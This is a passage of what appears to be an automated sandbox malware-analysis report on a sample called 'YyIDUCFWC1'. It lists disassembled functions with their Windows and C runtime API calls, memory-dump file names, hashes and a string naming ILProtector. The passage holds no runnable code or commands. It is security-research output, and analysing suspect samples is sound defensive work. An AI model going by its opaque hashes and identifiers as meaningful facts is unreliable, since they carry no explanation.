                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEEDB5E
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEEDB6E
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEEDB82
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEEDBF1
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEDBFB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                                                                                                                                                                                                              • String ID: 9Kl$1l
                                                                                                                                                                                                                                              • API String ID: 182531043-2405703077
                                                                                                                                                                                                                                              • Opcode ID: 23a8f3e465ed138dbecf62085d5ae03a4f3e72304a64893bc337ae5603aeb958
                                                                                                                                                                                                                                              • Instruction ID: 23d6bae9cbab62a99edb4bddc534fe19db42ab16cef6d22f57ad0cf0a551b9f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23a8f3e465ed138dbecf62085d5ae03a4f3e72304a64893bc337ae5603aeb958
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31B47AA00209AFD701DF55C844EEEBBF8FF99750F25815AEE11A7700D735A901CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2610073882-0
                                                                                                                                                                                                                                              • Opcode ID: 3591064d0d32ce061100b44077955d260180fcf951b1908725c4450262afa5e5
                                                                                                                                                                                                                                              • Instruction ID: 105a18fed54dbb4b035a7c3be60c44fd44b2fbed8a79940a02d94d7d776523b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3591064d0d32ce061100b44077955d260180fcf951b1908725c4450262afa5e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44C12472608B409FC300EF68C88095ABBF5BFCD748F248A4DE5989B765D731E845CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF6B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEF6C8B
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEF6CA6
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEF6CC7
                                                                                                                                                                                                                                                • Part of subcall function 6CEF5760: std::tr1::_Xweak.LIBCPMT ref: 6CEF5769
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEF6CF9
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF6F13
                                                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(6CF7C6A4,45524548,4B4F4F4C), ref: 6CEF6F34
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2722669376-0
                                                                                                                                                                                                                                              • Opcode ID: 33abbde4272c84736ec321a16f989a551cd41ac1e30e6a4baf0fc5e490e92c52
                                                                                                                                                                                                                                              • Instruction ID: f5a33504a75a0869630a82a5e12dce9afd7a7bcbd477ae6c26086dc9ded8c117
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33abbde4272c84736ec321a16f989a551cd41ac1e30e6a4baf0fc5e490e92c52
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBD1E371A102049FEB10DFA4C881BDE77B8BF49308F244569E929EB780D771EA05CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEE1B53
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEE1B5D
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE1C43
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE1C58
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • invalid vector<T> subscript, xrefs: 6CEE1B58
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                                                                                                                                                                                                              • String ID: invalid vector<T> subscript
                                                                                                                                                                                                                                              • API String ID: 3098024973-3016609489
                                                                                                                                                                                                                                              • Opcode ID: 7c2d79dbe37a8b844101895972013ac9b487f9705bf1a8e498e0569c28f09dcc
                                                                                                                                                                                                                                              • Instruction ID: ebaf7f09f0b45e145c2e8fbb61303978f5c815fd74810b8244a304be60dabd3b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c2d79dbe37a8b844101895972013ac9b487f9705bf1a8e498e0569c28f09dcc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6223971C007099FCB14DFA4C4809EEBBF5BF48354F218A5DD55AABB50E774AA88CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5BB98 Relevance: 8.8, Strings: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (o^q$(o^q$,bq$,bq$Hbq$Hbq$d8cq
                                                                                                                                                                                                                                              • API String ID: 0-3819729138
                                                                                                                                                                                                                                              • Opcode ID: c3dc12371c76530a2f409c4bb46564445ed7ba3460de0495eb8e1d506cfee9bb
                                                                                                                                                                                                                                              • Instruction ID: 6c8b2798aac3e2e3596381a0a7a8163b0039b6097d8b433cba135e396f58aa4c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3dc12371c76530a2f409c4bb46564445ed7ba3460de0495eb8e1d506cfee9bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B521C030A04218AFEB44AF789C46BBF7BBAFB84300F108466E545DB284DE749E15CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF39BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __FF_MSGBANNER.LIBCMT ref: 6CF39D7F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __NMSG_WRITE.LIBCMT ref: 6CF39D86
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF39BD4,6CED1290,FF0C5935), ref: 6CF39DAB
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                                              • String ID: Ql
                                                                                                                                                                                                                                              • API String ID: 615853336-532227320
                                                                                                                                                                                                                                              • Opcode ID: 8eef063c35d98cbaee1b58972f72d2c00d36960cc650ddf687def2e30020fec0
                                                                                                                                                                                                                                              • Instruction ID: 2731a5395642a17ff8559fd63bf34664a473a543ef86a4f86997198ca444d221
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8eef063c35d98cbaee1b58972f72d2c00d36960cc650ddf687def2e30020fec0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F0F43291013ABADF44EB55DC11A9D7AF8AB42758F102909E41892E81CF718B1886E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE6C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEE6C73
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,<ll), ref: 6CEE6C87
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CEE6C9A
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEE6CA3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                                                                                                                                                                                                                              • String ID: <ll
                                                                                                                                                                                                                                              • API String ID: 3147195435-3419007484
                                                                                                                                                                                                                                              • Opcode ID: e06a2ef78eb7f0a5df8d0626431b7cf51cff1f3a864bc4b3b91172dc127a724e
                                                                                                                                                                                                                                              • Instruction ID: a41e41609520d439cd0a0767bdfb12bb73a76d27f1ffeceb536f88e472bb4ba5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e06a2ef78eb7f0a5df8d0626431b7cf51cff1f3a864bc4b3b91172dc127a724e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0BE72310218BBEB115F91CC89F873FBCEF9A760F008005FA098A240E670D5009BB0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: T@12
                                                                                                                                                                                                                                              • String ID: a0
                                                                                                                                                                                                                                              • API String ID: 456891419-3188653782
                                                                                                                                                                                                                                              • Opcode ID: cb94032c3c33c9cb8a980b636a4f9e06cc8caa304059d7528bdcfcd5100193f5
                                                                                                                                                                                                                                              • Instruction ID: b43c9d4c7961f98347a5449636ca391d9902426168f561db0a9395dbe6f73970
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb94032c3c33c9cb8a980b636a4f9e06cc8caa304059d7528bdcfcd5100193f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72112170D11262BADF209AF7CC4CFAB7AFC9B82758F10B414A429E2951E628C541CAE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF01FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF02206
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF02221
                                                                                                                                                                                                                                                • Part of subcall function 6CF06480: __CxxThrowException@8.LIBCMT ref: 6CF06518
                                                                                                                                                                                                                                                • Part of subcall function 6CF06480: __CxxThrowException@8.LIBCMT ref: 6CF06558
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                                                                                                                                                                                                              • String ID: ILProtector
                                                                                                                                                                                                                                              • API String ID: 84431791-1153028812
                                                                                                                                                                                                                                              • Opcode ID: bbc245bf48336d2bc5aedb2eabba37275d215d865957b7f2da8e87ea6a0680bd
                                                                                                                                                                                                                                              • Instruction ID: 40d86e529386447c4e6be580f6bbab53e8ac63ac1c1d14e780f586b13492598b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbc245bf48336d2bc5aedb2eabba37275d215d865957b7f2da8e87ea6a0680bd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D714875E04218DFCB54CFA8C894BEEBBB4EB49300F1081ADE419A7740DB316A48CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE913B
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE915C
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CEE9170
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CEE9191
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                                              • Opcode ID: 904dd54e2e18790d5b8f1eb49ed63792101d5182468535ed68d2bf246f06cf73
                                                                                                                                                                                                                                              • Instruction ID: 0ff5dd1924a3bc8144f7391a9e9a5f8e9a470cd1fef4df47177020fc7792afb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 904dd54e2e18790d5b8f1eb49ed63792101d5182468535ed68d2bf246f06cf73
